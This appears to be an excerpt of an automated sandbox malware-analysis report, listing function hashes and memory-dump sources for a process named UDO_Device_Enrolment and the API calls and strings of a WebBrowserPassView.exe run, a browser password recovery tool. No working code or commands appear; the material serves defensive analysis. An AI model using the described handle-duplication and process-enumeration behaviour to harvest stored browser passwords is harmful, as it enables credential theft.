Instruction Fuzzy Hash: 42419F9140EBC94FE757A7748C685A17FA4DF17228B0901EBD4C8CB0E7E8485D4AC366

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAD208135 Relevance: .6, Instructions: 618COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.339631134.00007FFBAD200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbad200000_UDO_Device_Enrolment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9cdfac3e0b9b524951817479e1664d9ec8785de1f68e384bf3a0702b02e709fd
Instruction ID: 89cc2be759de6553901c0067020d4e955ef3dddf79303bda249f0c1447f3473b
Opcode Fuzzy Hash: 9cdfac3e0b9b524951817479e1664d9ec8785de1f68e384bf3a0702b02e709fd
Instruction Fuzzy Hash: 8DD16E70A08A4D8FDF95EF68C495AE9BBF1FF68300F144169D409D7696DA34EC81CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAD2B43B6 Relevance: .5, Instructions: 509COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.339971319.00007FFBAD2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD2B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbad2b0000_UDO_Device_Enrolment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 560ab083a6726320dfe852292516c524c1f7ab3d19c3ec3087753f9ebee60920
Instruction ID: af97b6f87bdb98ee60cb581cca6d76b36598491ac8a83b2774a93ed9dd02e89f
Opcode Fuzzy Hash: 560ab083a6726320dfe852292516c524c1f7ab3d19c3ec3087753f9ebee60920
Instruction Fuzzy Hash: 56F119A190EB8A4FEB97E738C8951B47BE1EF5A214B0802BFD44DC71D7EA589C06C351

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAD207D05 Relevance: .3, Instructions: 310COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.339631134.00007FFBAD200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbad200000_UDO_Device_Enrolment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad3ffc8710b36d2910bfb34c0c313df277c5169302349865db3683cba86e8db1
Instruction ID: 5b2c9d2e932678659861fad3356f85e958e5ec333e51edbfc64320729979c74f
Opcode Fuzzy Hash: ad3ffc8710b36d2910bfb34c0c313df277c5169302349865db3683cba86e8db1
Instruction Fuzzy Hash: E1917D3150D7855FD746EB38C8919F17BE1EF96321B0405FED489C71A3EA28AC4AC791

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAD206FD6 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.339631134.00007FFBAD200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbad200000_UDO_Device_Enrolment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21f1a9359b4d3e53c076e28e2d143278d356ec0b4a5fdcc91e76fba717ec82d4
Instruction ID: e22a061d2d9853533642cbe6eb591237848932817d35c553b76d2a6bd1d1e254
Opcode Fuzzy Hash: 21f1a9359b4d3e53c076e28e2d143278d356ec0b4a5fdcc91e76fba717ec82d4
Instruction Fuzzy Hash: 8D8124B080E7465FE76AEB38C4462A577D0EF58311F144ABED84EC7097ED28AC46C792

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAD2003AA Relevance: .2, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.339631134.00007FFBAD200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbad200000_UDO_Device_Enrolment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 939507c91ef5e862ac9f03addc08fd7823c22da6447ee8261d1a32f8ffaa0457
Instruction ID: 6655a79269baea1a3f1690789a3ce56847255e03a7d6cdf26caf271b9d3a8802
Opcode Fuzzy Hash: 939507c91ef5e862ac9f03addc08fd7823c22da6447ee8261d1a32f8ffaa0457
Instruction Fuzzy Hash: 00511882D0D79A1BF756BB38986A4F53B91EF56310F0405BBD88DC7097EC286C4AC2A5

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAD205501 Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.339631134.00007FFBAD200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbad200000_UDO_Device_Enrolment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc30cf7d6aeb4302f65e1b6bbaac5f044450782e23d5ad3e48151829f36899a8
Instruction ID: f26120b0b6cecd3d26667d3c9dc393a8d5e5a91070aa727420df7fd3b9da83b2
Opcode Fuzzy Hash: bc30cf7d6aeb4302f65e1b6bbaac5f044450782e23d5ad3e48151829f36899a8
Instruction Fuzzy Hash: CE510271A1DB494FE758EB28C4166BA77E2FF98300F10097DD48EC7296DE68AC0287C1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAD2B4618 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.339971319.00007FFBAD2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD2B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbad2b0000_UDO_Device_Enrolment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a72155040502fcec74a65023061207473fc787be74b811de2693b243cfd70ee9
Instruction ID: eb10a19e7c7e1bb45c982e35b81b7168c560e0e33e882f6c336063365e97eb0d
Opcode Fuzzy Hash: a72155040502fcec74a65023061207473fc787be74b811de2693b243cfd70ee9
Instruction Fuzzy Hash: AD512D62E0EB9A4FEB96E72CC8955B877D1EF18218B0802BED44DC71D7ED189C02C351

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAD204AC5 Relevance: .2, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.339631134.00007FFBAD200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbad200000_UDO_Device_Enrolment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9ba2c879a1ec40825bceecc20145a6dfd722d8b388c197d924c8cdb8e664653
Instruction ID: 4965453e7c3c5bfd0fc76dd6c8a182d1b69c5365b0d5b5e4ff57f13638baf8ee
Opcode Fuzzy Hash: a9ba2c879a1ec40825bceecc20145a6dfd722d8b388c197d924c8cdb8e664653
Instruction Fuzzy Hash: B8510171908B1C8FDB58EF58C8456E9BBF1FF59310F0082ABE409D7252DA30A845CBC2

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAD2005A2 Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.339631134.00007FFBAD200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbad200000_UDO_Device_Enrolment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 953244c227875254898b136425c13561c15c1c62f88ced656bfc1307dbef4898
Instruction ID: 20bbb4e32dd5b35a6a18aa20d4223831c512c52b1cebad95bf5d45518841fa8c
Opcode Fuzzy Hash: 953244c227875254898b136425c13561c15c1c62f88ced656bfc1307dbef4898
Instruction Fuzzy Hash: 1341E461A1DA0A5FEB98EB2CD4566B873E2EFC8310B144179D40EC32C7DD24AC47C745

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAD0DECBF Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.338743961.00007FFBAD0DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD0DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbad0dd000_UDO_Device_Enrolment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe4f893370137307531864a5a8c10b37bf4f5f97546df55f1cbe7462707e1ffa
Instruction ID: 1396f0bc9d9d18a942153dceac87cb88e9a0dcdc81a9931c23b86ab573abd243
Opcode Fuzzy Hash: fe4f893370137307531864a5a8c10b37bf4f5f97546df55f1cbe7462707e1ffa
Instruction Fuzzy Hash: 3931F37080EBC44FE7579B39D8559523FB0EB56220B1505EFD4C8CB1A3DA25A846C792

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAD207DFA Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.339631134.00007FFBAD200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbad200000_UDO_Device_Enrolment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b84bafbbeeaedf45f199cc69fb01c3023bae2365f44f5fed7d4f378e8e63fc2
Instruction ID: a277e02218c16dc8a13b4e8d912d683b4c9b734356bc92d4a895f9b2fa198731
Opcode Fuzzy Hash: 5b84bafbbeeaedf45f199cc69fb01c3023bae2365f44f5fed7d4f378e8e63fc2
Instruction Fuzzy Hash: 9B31257161DB095FDB88EE2CC891971B3E1FB9C315B10057DD58AC7656EA22FC42CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAD207B38 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.339631134.00007FFBAD200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbad200000_UDO_Device_Enrolment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25c66ed77524793bda16c7ce5f0290eec46612487b7b06b658946e9698536b04
Instruction ID: 5de3dc016925608bd7d971bcb65055425d4892038d479dd53423429a46ca2950
Opcode Fuzzy Hash: 25c66ed77524793bda16c7ce5f0290eec46612487b7b06b658946e9698536b04
Instruction Fuzzy Hash: 9E418C6150E7C11FD7479B34C8954A17FB0AF5721071985EBC888CF1ABE61D9C86C361

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAD206029 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.339631134.00007FFBAD200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbad200000_UDO_Device_Enrolment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93919e94c6aeeab6e39ed55921f18821db712d21807e0bfd58e452adad52a64a
Instruction ID: f2e4422e775900eaa6ae47fdf3eab1708f7c964e859ed80e7247f9fa8aa50ff5
Opcode Fuzzy Hash: 93919e94c6aeeab6e39ed55921f18821db712d21807e0bfd58e452adad52a64a
Instruction Fuzzy Hash: 2E414F71218A088FD75CDF28D491A65B3E1FF9831476045ADD48ACB3A6DA32FC43CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAD201912 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.339631134.00007FFBAD200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbad200000_UDO_Device_Enrolment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44e00657421e26e119a53804aee4df6e06aa9cc3b6d52a58ea99bc7903d207a8
Instruction ID: 52f7daa27ef2cbd0bbfa0fcfea8d6a60d377083a17d7b5a8783f145aaaba6819
Opcode Fuzzy Hash: 44e00657421e26e119a53804aee4df6e06aa9cc3b6d52a58ea99bc7903d207a8
Instruction Fuzzy Hash: 3B318F5194F7C91FE3879BB898255A13FF5DF5B21070901FBD889CB1A7D9099C09C362

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAD205397 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.339631134.00007FFBAD200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbad200000_UDO_Device_Enrolment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8392a837a5508c218a894e5e41f3dc6dfe5a25bd4883b0eb6ebeb1a00e42350a
Instruction ID: 6747be394eeefc473fa3c6ac79dd7473c0217273435ce60027ba2837cab113dc
Opcode Fuzzy Hash: 8392a837a5508c218a894e5e41f3dc6dfe5a25bd4883b0eb6ebeb1a00e42350a
Instruction Fuzzy Hash: DD310AA290EF891FE756AE3884955E17BE0EF49311F04077AD89EC71D6ED286C0AC391

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAD2B3F48 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.339971319.00007FFBAD2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD2B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbad2b0000_UDO_Device_Enrolment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 864861f951dd74aecf54340272083a2964af5d37d2dd35378fd17c56ad94774f
Instruction ID: 45e60071881fd390c2e3f4c6d427f6ee002b0977dd07e9019ac6c3fb1621d9cf
Opcode Fuzzy Hash: 864861f951dd74aecf54340272083a2964af5d37d2dd35378fd17c56ad94774f
Instruction Fuzzy Hash: 7531419290F7C61ED763633898256A06FB1CF57550B0A02EBC5C9CF1E7E8485D1AC366

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAD0DECC3 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.338743961.00007FFBAD0DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD0DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbad0dd000_UDO_Device_Enrolment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db5b8effbee722de56e77cd9a0cd2fe56bdb16b3a495711e33ca475077df6754
Instruction ID: 48e6c4606b2e11e25c396a575f77d65c5469432d8d0d0ffea23a86e9f38f580a
Opcode Fuzzy Hash: db5b8effbee722de56e77cd9a0cd2fe56bdb16b3a495711e33ca475077df6754
Instruction Fuzzy Hash: E931A07080EBC45FD7979B39C8559123FB0EF56310B1905DFD4C8CB1A3D625A85AC762

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAD204CA5 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.339631134.00007FFBAD200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbad200000_UDO_Device_Enrolment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de150472f7ce583427e3118dc4706b26e93edaa8e8b86d30fa359af962029394
Instruction ID: 3e4a74d3cf97416d20c0eadfb350dac1fc1c8d175001895693361e25e4a4ccdb
Opcode Fuzzy Hash: de150472f7ce583427e3118dc4706b26e93edaa8e8b86d30fa359af962029394
Instruction Fuzzy Hash: 85312D7190EBC25FE357AB74D8902607BD0FF5A225B4409BDC485C65D7EA2DB882C341

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAD2040B4 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.339631134.00007FFBAD200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbad200000_UDO_Device_Enrolment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a708c8bf759c47f030246c21c4738eea25858a6bcb80292f90f9c26659a3801e
Instruction ID: 5788ff0184b5d686e9d1b7d94b9cb8b001c3cb09cceb1a2cdff8babb3a0bf936
Opcode Fuzzy Hash: a708c8bf759c47f030246c21c4738eea25858a6bcb80292f90f9c26659a3801e
Instruction Fuzzy Hash: 5A21F87051CB498FD74AEF18D0916B9B7E0FF99320F10497DE58AC71A6EA36E842CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAD2010A1 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.339631134.00007FFBAD200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbad200000_UDO_Device_Enrolment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47218739dc31cc0c2b0b8214fe1740c27b4904b957aaa8aff94745acf3f6e3e0
Instruction ID: 9e835c937e60f43ecc65d098d092d5965f4cd9521c169e766586175fd8c9f1fb
Opcode Fuzzy Hash: 47218739dc31cc0c2b0b8214fe1740c27b4904b957aaa8aff94745acf3f6e3e0
Instruction Fuzzy Hash: 55217F6044EBC25FE3234B348865701BFA1AF47168F1D06DED0D58E5E7E6EE944AC322

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAD0DEDE0 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.338743961.00007FFBAD0DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD0DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbad0dd000_UDO_Device_Enrolment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ced953ea5ae63c7e3cc7ff53868f9d91ae4225909934bd3453e5f3a8fd9633b0
Instruction ID: 054b6318e81afdfd327b8adb57e81b87ea9e9c35dfb97ac54ec952b08f553cd4
Opcode Fuzzy Hash: ced953ea5ae63c7e3cc7ff53868f9d91ae4225909934bd3453e5f3a8fd9633b0
Instruction Fuzzy Hash: C401FEA595EBC48FC757D738C8695103FE0EF5A30070504EAD4CACB1A2E958EC09C361

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAD207EE9 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.339631134.00007FFBAD200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbad200000_UDO_Device_Enrolment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 659fd828d071dc414ba5f0547a76afb0a2e3f84e860b767da4ae64cd69c16f07
Instruction ID: fdec5e11151c19e95f9d8bb11ee73dc56f4849f9acf5319fcdac01e4b58c60db
Opcode Fuzzy Hash: 659fd828d071dc414ba5f0547a76afb0a2e3f84e860b767da4ae64cd69c16f07
Instruction Fuzzy Hash: 3DF0A03271C7084FDB4CAA1CE84297473D0EB89320B00017EF88BC2697E817E842C685

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAD202DBC Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.339631134.00007FFBAD200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbad200000_UDO_Device_Enrolment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57133e851b374d69241911ace99a22873a172afac480563244357cdbcbf7e154
Instruction ID: a0ba4439856b48008041fb3089557e673745b513a0162a9aed182f0ac3ca250c
Opcode Fuzzy Hash: 57133e851b374d69241911ace99a22873a172afac480563244357cdbcbf7e154
Instruction Fuzzy Hash: B4E0485091F3461EEA57BB79C8591A519C0EF0A310F8848F6D84DC659AF80E5C85C141

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAD2016CB Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.339631134.00007FFBAD200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbad200000_UDO_Device_Enrolment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5aba5e4d50df4a03225940da44c443cc25e2364a6bcbaf2b66530cd87ffdf9d
Instruction ID: 584df42eee2cf342d1265328cae489d272d6e3af6db5a757cfa62e835ea34ba8
Opcode Fuzzy Hash: b5aba5e4d50df4a03225940da44c443cc25e2364a6bcbaf2b66530cd87ffdf9d
Instruction Fuzzy Hash: 9AF0A930511A4C8FD349EF28C40469533A4FF49304F4001AAE80CC7242DA3AEAA1CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAD2056E2 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.339631134.00007FFBAD200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbad200000_UDO_Device_Enrolment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e3ef4ac8f700faa9861c660e42d2535a00a2c9fe5cd7001af0f4ca92228ba3f
Instruction ID: d351f86194661de02c0ce2bca6ed9786305a66a8e5e755e0d817ca9eb5fc0cda
Opcode Fuzzy Hash: 4e3ef4ac8f700faa9861c660e42d2535a00a2c9fe5cd7001af0f4ca92228ba3f
Instruction Fuzzy Hash: 35F08C3294A706CFE36AA738D400BE5B291FF45309F600ABDC40DC7292D93BA887CB11

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAD208B81 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.339631134.00007FFBAD200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbad200000_UDO_Device_Enrolment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29408c861d903c562f7521672d7bcdab38d8f05a77a9ebdb4df098167a670d04
Instruction ID: 7b6e6574ef9f21caa718320ae2a69df68d0367f32010f2fb3277c20ebfc65c82
Opcode Fuzzy Hash: 29408c861d903c562f7521672d7bcdab38d8f05a77a9ebdb4df098167a670d04
Instruction Fuzzy Hash: 17E0C2E280F3C01FC7426735881E4847F50DE0B12238904EEC086CF163E21D4805C742

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAD201C90 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.339631134.00007FFBAD200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbad200000_UDO_Device_Enrolment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02fddb48564b8d05971f21f8ca55ac47525c424e2b49bc963370912c25e5b6e6
Instruction ID: 80a77d780eefd46fbd911e1aeb68de55058979bda815b0078daeb78476eebd43
Opcode Fuzzy Hash: 02fddb48564b8d05971f21f8ca55ac47525c424e2b49bc963370912c25e5b6e6
Instruction Fuzzy Hash: ACD02B7040C3400BD3495A1594034B97BD0CB512E0B4005BEF8C3C5192D51CDAC28663

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAD2042A0 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.339631134.00007FFBAD200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbad200000_UDO_Device_Enrolment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2e7b159c5abcb8f21b7ab0afc768d3ea44c9350463065cd783a8b3be42a4f2d
Instruction ID: 2c03a4a1b369c620785ef4f438c74a79d17a731dac0b17ef5ac3e97498eb001c
Opcode Fuzzy Hash: a2e7b159c5abcb8f21b7ab0afc768d3ea44c9350463065cd783a8b3be42a4f2d
Instruction Fuzzy Hash: 12B0125181553501E70A7F98F9834F93360CB443D1B010875FE05CD287F81D56E281E5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FFBAD207F83 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.339631134.00007FFBAD200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbad200000_UDO_Device_Enrolment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39b9b8d279c8ff93b22dca29891ebd818101bef4ce3e0c8d3bf9dd3fdd3a4c80
Instruction ID: a7e703a98d6eab9383627bd83a4626d25ab05af913c62d7d16e4cbfbef96a112
Opcode Fuzzy Hash: 39b9b8d279c8ff93b22dca29891ebd818101bef4ce3e0c8d3bf9dd3fdd3a4c80
Instruction Fuzzy Hash: D531D4C790E7C32AE753753CD8650E5AF91EEA723171845B3D984CE4D7BD085C4A8262

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: WebBrowserPassView.exePID: 3384, Parent PID: 588COMMON

Execution Graph

Execution Coverage:	6.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.9%
Total number of Nodes:	1907
Total number of Limit Nodes:	45

Executed Functions

Function 0040BAE3 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 212
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 0040BB0B

Part of subcall function 0040A189: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040E194,00000000,0040E047,?,00000000,00000208,?), ref: 0040A194

CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040BB32

Part of subcall function 0040B5F5: ??2@YAPAXI@Z.MSVCRT ref: 0040B5FE

Part of subcall function 00413A57: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040BB60,?,000000FF,00000000,00000104), ref: 00413A6A
Part of subcall function 00413A57: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413A81
Part of subcall function 00413A57: GetProcAddress.KERNEL32(NtLoadDriver), ref: 00413A93
Part of subcall function 00413A57: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00413AA5
Part of subcall function 00413A57: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00413AB7
Part of subcall function 00413A57: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00413AC9
Part of subcall function 00413A57: GetProcAddress.KERNEL32(NtQueryObject), ref: 00413ADB
Part of subcall function 00413A57: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 00413AED
Part of subcall function 00413A57: GetProcAddress.KERNEL32(NtResumeProcess), ref: 00413AFF

NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040BB73
FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040BB9C
GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040BBA7
_wcsicmp.MSVCRT ref: 0040BC10
_wcsicmp.MSVCRT ref: 0040BC23
_wcsicmp.MSVCRT ref: 0040BC36
OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040BC4A
GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040BC90
DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040BC9F
memset.MSVCRT ref: 0040BCBD
CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040BCF0
_wcsicmp.MSVCRT ref: 0040BD10
CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040BD50

Strings

dllhost.exe, xrefs: 0040BC07
taskhost.exe, xrefs: 0040BC1B
taskhostex.exe, xrefs: 0040BC2E

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindInformationNameNotificationOpenQuerySystem
String ID: dllhost.exe$taskhost.exe$taskhostex.exe
